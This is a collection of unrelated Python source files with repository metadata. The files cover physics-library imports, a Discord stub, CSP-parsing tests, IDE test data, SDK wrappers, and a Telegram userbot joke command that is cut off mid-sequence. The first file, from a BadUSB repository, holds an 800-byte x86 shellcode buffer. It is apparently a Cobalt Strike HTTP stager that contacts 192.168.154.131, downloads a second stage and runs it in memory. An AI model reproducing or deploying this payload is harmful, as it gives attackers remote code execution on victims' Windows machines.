| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1fc263f8231e3b4ac5fef9c6c103abfb53893931
| 3,229
|
py
|
Python
|
CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py
|
Tokisaki-Galaxy/BadUSB
|
11f55ac48357acb737ab1204f671cbfe3dfa45b1
|
[
"BSD-3-Clause"
] | 145
|
2019-10-21T12:07:24.000Z
|
2022-03-21T23:20:57.000Z
|
CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py
|
beidouhz/BadUSB
|
11f55ac48357acb737ab1204f671cbfe3dfa45b1
|
[
"BSD-3-Clause"
] | 1
|
2020-11-04T03:13:35.000Z
|
2021-02-08T16:44:34.000Z
|
CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py
|
beidouhz/BadUSB
|
11f55ac48357acb737ab1204f671cbfe3dfa45b1
|
[
"BSD-3-Clause"
] | 33
|
2019-08-26T23:29:54.000Z
|
2022-02-27T09:43:43.000Z
|
# length: 800 bytes
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x77\x31\x4e\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00"
| 1,076.333333
| 3,208
| 0.748529
| 804
| 3,229
| 3.006219
| 0.185323
| 0.074472
| 0.111709
| 0.14398
| 0.405875
| 0.356227
| 0.356227
| 0.356227
| 0.356227
| 0.356227
| 0
| 0.394786
| 0.002168
| 3,229
| 2
| 3,209
| 1,614.5
| 0.355369
| 0.005265
| 0
| 0
| 0
| 1
| 0.996885
| 0.996885
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9513df2531ca00bf32c9f072836e3022745872ad
| 214
|
py
|
Python
|
src/xhorizon/tortoise/__init__.py
|
xh-diagrams/xhorizon
|
20b3f2f0f621ca2a31c9f6a1d5fcd06692a700ce
|
[
"MIT"
] | null | null | null |
src/xhorizon/tortoise/__init__.py
|
xh-diagrams/xhorizon
|
20b3f2f0f621ca2a31c9f6a1d5fcd06692a700ce
|
[
"MIT"
] | null | null | null |
src/xhorizon/tortoise/__init__.py
|
xh-diagrams/xhorizon
|
20b3f2f0f621ca2a31c9f6a1d5fcd06692a700ce
|
[
"MIT"
] | null | null | null |
from xhorizon.tortoise import math_util
from xhorizon.tortoise import metfunc_class
from xhorizon.tortoise import metfunc_factory
from xhorizon.tortoise import metfunc_tests
from xhorizon.tortoise import tortoise
| 30.571429
| 45
| 0.878505
| 29
| 214
| 6.344828
| 0.344828
| 0.326087
| 0.543478
| 0.706522
| 0.538043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098131
| 214
| 6
| 46
| 35.666667
| 0.953368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1f0149c05f64705d7cb6983695b2ccb56271eac7
| 67
|
py
|
Python
|
utils/embed.py
|
k-anson/clash_watcher
|
fa8aba99719e8b6088a73ce67cc851a2f6908b73
|
[
"MIT"
] | 1
|
2020-11-29T17:18:39.000Z
|
2020-11-29T17:18:39.000Z
|
utils/embed.py
|
k-anson/clash_watcher
|
fa8aba99719e8b6088a73ce67cc851a2f6908b73
|
[
"MIT"
] | null | null | null |
utils/embed.py
|
k-anson/clash_watcher
|
fa8aba99719e8b6088a73ce67cc851a2f6908b73
|
[
"MIT"
] | null | null | null |
from discord import Embed
def analyze_war_embed() -> Embed:
pass
| 16.75
| 33
| 0.761194
| 10
| 67
| 4.9
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164179
| 67
| 4
| 34
| 16.75
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
1f6d5576f704b06b83f7ca0c53c0e1100f1bb1e8
| 6,456
|
py
|
Python
|
tests/test_csp_extract.py
|
crataegustess/csp-tool
|
7d998abf22eb8823d59b4ee2446de334ff396a9c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_csp_extract.py
|
crataegustess/csp-tool
|
7d998abf22eb8823d59b4ee2446de334ff396a9c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_csp_extract.py
|
crataegustess/csp-tool
|
7d998abf22eb8823d59b4ee2446de334ff396a9c
|
[
"Apache-2.0"
] | 2
|
2020-06-19T12:39:56.000Z
|
2021-04-10T23:43:30.000Z
|
import pytest
from csp_tool.csp_extractor import extract_csp_part_from_java_like_entry, extract_full_csp, decode_base64_entry
def test_can_decode_base64_entry():
plain = "default-src 'self' 'unsafe-inline' 'unsafe-eval' www.googletagmanager.com www.google-analytics.com tagmanager.google.com fonts.googleapis.com ssl.gstatic.com www.gstatic.com fonts.gstatic.com fonts.googleapis.com data:;"
base_64_csp = 'ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7'
decoded = decode_base64_entry(base_64_csp)
assert plain == decoded
def test_can_extract_csp_pair_from_java_like_string():
java_like = "-J-Dapplication.router=testOnlyDoNotUseInAppConf.Routes -Dhttp.port=9284 -Dplay.filters.headers.contentSecurityPolicy='www.google-analytics.com'"
expected_extracted_value = "www.google-analytics.com"
assert expected_extracted_value == extract_csp_part_from_java_like_entry(java_like)
def test_highlights_base64_csp_strings():
base_64_csp = 'play.filters.headers.contentSecurityPolicy.base64 = "ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7"'
expected_return = 'base64: ' + 'ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7'
assert expected_return == extract_full_csp(base_64_csp)
def test_highlights_base64_csp_strings_without_prefix():
base_64_csp = 'contentSecurityPolicy ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7'
expected_return = 'base64: ' + 'ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7'
assert expected_return == extract_full_csp(base_64_csp)
@pytest.mark.parametrize(
"entry,expected_csp",
[
('something unexpected', None),
("-J-Dapplication.router=testOnlyDoNotUseInAppConf.Routes -Dhttp.port=9284 -Dplay.filters.headers.contentSecurityPolicy='www.google-analytics.com'", "www.google-analytics.com"),
(' "-Dplay.filters.headers.contentSecurityPolicy='+"'www.google-analytics.com'","www.google-analytics.com"),
("contentSecurity default-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.googletagmanager.com https://www.google-analytics.com https://tagmanager.google.com https://fonts.googleapis.com https://ssl.gstatic.com https://www.gstatic.com https://fonts.gstatic.com https://fonts.googleapis.com data:;", "default-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.googletagmanager.com https://www.google-analytics.com https://tagmanager.google.com https://fonts.googleapis.com https://ssl.gstatic.com https://www.gstatic.com https://fonts.gstatic.com https://fonts.googleapis.com data:;"),
("filters.headers.security.contentSecurity default-src 'self' 'unsafe-inline' 'unsafe-eval' webchat.tax.service.gov.uk *.analytics-egain.com https://www.googletagmanager.com https://www.google-analytics.com https://tagmanager.google.com https://fonts.googleapis.com https://ssl.gstatic.com https://www.gstatic.com https://fonts.gstatic.com https://fonts.googleapis.com data:","default-src 'self' 'unsafe-inline' 'unsafe-eval' webchat.tax.service.gov.uk *.analytics-egain.com https://www.googletagmanager.com https://www.google-analytics.com https://tagmanager.google.com https://fonts.googleapis.com https://ssl.gstatic.com https://www.gstatic.com https://fonts.gstatic.com https://fonts.googleapis.com data:"),
("#filters.headers.contentSecurity default-src 'self' 'unsafe-inline' localhost:9000 localhost:9032 localhost:9250 stats.g.doubleclick.net www.google-analytics.com object-src 'none'","default-src 'self' 'unsafe-inline' localhost:9000 localhost:9032 localhost:9250 stats.g.doubleclick.net www.google-analytics.com object-src 'none'"),
("play.filters.headers.contentSecurity default-src 'self' 'unsafe-inline' www.google-analytics.com app.optimizely.com cdn.optimizely.com *.optimizely.com optimizely.s3.amazonaws.com data:", "default-src 'self' 'unsafe-inline' www.google-analytics.com app.optimizely.com cdn.optimizely.com *.optimizely.com optimizely.s3.amazonaws.com data:"),
('play.filters.headers.contentSecurityPolicy: "default-src"', 'default-src'),
('play.filters.headers.contentSecurityPolicy: "ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwn"', 'base64: ' + 'ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwn'),
("headers.contentSecurityPolicy= \"default-src 'self' 'unsafe-inline' analytics.analytics-egain.com localhost:9032 localhost:9310 *.optimizely.com optimizely.s3.amazonaws.com www.google-analytics.com www.googletagmanager.com fonts.googleapis.com tagmanager.google.com ssl.gstatic.com www.gstatic.com fonts.gstatic.com data:\"", "default-src 'self' 'unsafe-inline' analytics.analytics-egain.com localhost:9032 localhost:9310 *.optimizely.com optimizely.s3.amazonaws.com www.google-analytics.com www.googletagmanager.com fonts.googleapis.com tagmanager.google.com ssl.gstatic.com www.gstatic.com fonts.gstatic.com data:"),
("//play.filters.headers.contentSecurityPolicy = \"default-src 'self' localhost:9000 localhost:9032 localhost:9250 www.google-analytics.com\"", "default-src 'self' localhost:9000 localhost:9032 localhost:9250 www.google-analytics.com"),
],
)
def test_extract_csp_from_entry(entry, expected_csp):
csp = extract_full_csp(entry)
assert expected_csp == csp
| 124.153846
| 719
| 0.825279
| 647
| 6,456
| 8.11592
| 0.14374
| 0.045706
| 0.06513
| 0.075986
| 0.791278
| 0.781375
| 0.768806
| 0.750143
| 0.719292
| 0.719292
| 0
| 0.065636
| 0.067844
| 6,456
| 52
| 720
| 124.153846
| 0.806913
| 0
| 0
| 0.105263
| 0
| 0.342105
| 0.761809
| 0.438904
| 0.052632
| 0
| 0
| 0
| 0.131579
| 1
| 0.131579
| false
| 0
| 0.052632
| 0
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1f7db653aecb6076868eb63b9ed5143aa1c631b9
| 302
|
py
|
Python
|
python/testData/inspections/PySetFunctionToLiteralInspection/test.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PySetFunctionToLiteralInspection/test.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PySetFunctionToLiteralInspection/test.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
my_set = set()
my_set = <warning descr="Function call can be replaced with set literal">set([1,2,3])</warning>
my_set = <warning descr="Function call can be replaced with set literal">set((1,2,3))</warning>
my_set = set(var)
def set(fake=None):
pass
my_fake_set = set()
my_fake_set = set([1,2,3])
| 25.166667
| 95
| 0.695364
| 57
| 302
| 3.54386
| 0.333333
| 0.09901
| 0.074257
| 0.089109
| 0.707921
| 0.707921
| 0.707921
| 0.707921
| 0.707921
| 0.707921
| 0
| 0.034615
| 0.139073
| 302
| 11
| 96
| 27.454545
| 0.742308
| 0
| 0
| 0
| 0
| 0
| 0.304636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.125
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2f54ed69e022e1f669b9a440fe5d8f24d05f272d
| 3,211
|
py
|
Python
|
accelbyte_py_sdk/api/gdpr/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/gdpr/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/gdpr/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
"""Auto-generated package that contains models used by the justice-gdpr-service."""
__version__ = "1.14.6"
__author__ = "AccelByte"
__email__ = "dev@accelbyte.net"
# pylint: disable=line-too-long
from ._data_deletion import admin_cancel_user_account_deletion_request
from ._data_deletion import admin_cancel_user_account_deletion_request_async
from ._data_deletion import admin_get_list_deletion_data_request
from ._data_deletion import admin_get_list_deletion_data_request_async
from ._data_deletion import admin_get_user_account_deletion_request
from ._data_deletion import admin_get_user_account_deletion_request_async
from ._data_deletion import admin_submit_user_account_deletion_request
from ._data_deletion import admin_submit_user_account_deletion_request_async
from ._data_deletion import public_cancel_user_account_deletion_request
from ._data_deletion import public_cancel_user_account_deletion_request_async
from ._data_deletion import public_get_user_account_deletion_status
from ._data_deletion import public_get_user_account_deletion_status_async
from ._data_deletion import public_submit_user_account_deletion_request
from ._data_deletion import public_submit_user_account_deletion_request_async
from ._data_retrieval import admin_cancel_user_personal_data_request
from ._data_retrieval import admin_cancel_user_personal_data_request_async
from ._data_retrieval import admin_generate_personal_data_url
from ._data_retrieval import admin_generate_personal_data_url_async
from ._data_retrieval import admin_get_list_personal_data_request
from ._data_retrieval import admin_get_list_personal_data_request_async
from ._data_retrieval import admin_get_user_personal_data_requests
from ._data_retrieval import admin_get_user_personal_data_requests_async
from ._data_retrieval import admin_request_data_retrieval
from ._data_retrieval import admin_request_data_retrieval_async
from ._data_retrieval import delete_admin_email_configuration
from ._data_retrieval import delete_admin_email_configuration_async
from ._data_retrieval import get_admin_email_configuration
from ._data_retrieval import get_admin_email_configuration_async
from ._data_retrieval import public_cancel_user_personal_data_request
from ._data_retrieval import public_cancel_user_personal_data_request_async
from ._data_retrieval import public_generate_personal_data_url
from ._data_retrieval import public_generate_personal_data_url_async
from ._data_retrieval import public_get_user_personal_data_requests
from ._data_retrieval import public_get_user_personal_data_requests_async
from ._data_retrieval import public_request_data_retrieval
from ._data_retrieval import public_request_data_retrieval_async
from ._data_retrieval import save_admin_email_configuration
from ._data_retrieval import save_admin_email_configuration_async
from ._data_retrieval import update_admin_email_configuration
from ._data_retrieval import update_admin_email_configuration_async
| 55.362069
| 83
| 0.903145
| 456
| 3,211
| 5.721491
| 0.175439
| 0.122652
| 0.169414
| 0.229207
| 0.868915
| 0.868915
| 0.866999
| 0.866999
| 0.641242
| 0.574166
| 0
| 0.00268
| 0.070383
| 3,211
| 57
| 84
| 56.333333
| 0.871357
| 0.112426
| 0
| 0
| 1
| 0
| 0.011276
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.930233
| 0
| 0.930233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
2f5f898701e4783163c91a9c18c0442de734dabd
| 9,748
|
py
|
Python
|
userbot/modules/petrus.py
|
ichn666shit/Yama
|
8dc991aa01f0810341520133c27bea436537656b
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/petrus.py
|
ichn666shit/Yama
|
8dc991aa01f0810341520133c27bea436537656b
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/petrus.py
|
ichn666shit/Yama
|
8dc991aa01f0810341520133c27bea436537656b
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
from time import sleep
from userbot import CMD_HELP
from userbot.events import register
@register(outgoing=True, pattern=r"^\.petrus(?: |$)(.*)")
async def typewriter(typew):
typew.pattern_match.group(1)
await typew.edit("`Operasi petrus dilaksanakeun!1!1 ツ`")
sleep(2)
await typew.edit("`Mencari antek-antek PKI...`")
sleep(1)
await typew.edit("`KETEMU! GASKEUN!1!1`")
sleep(1)
await typew.edit("0%")
number = 1
await typew.edit(str(number) + "% ▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▊")
number = number + 1
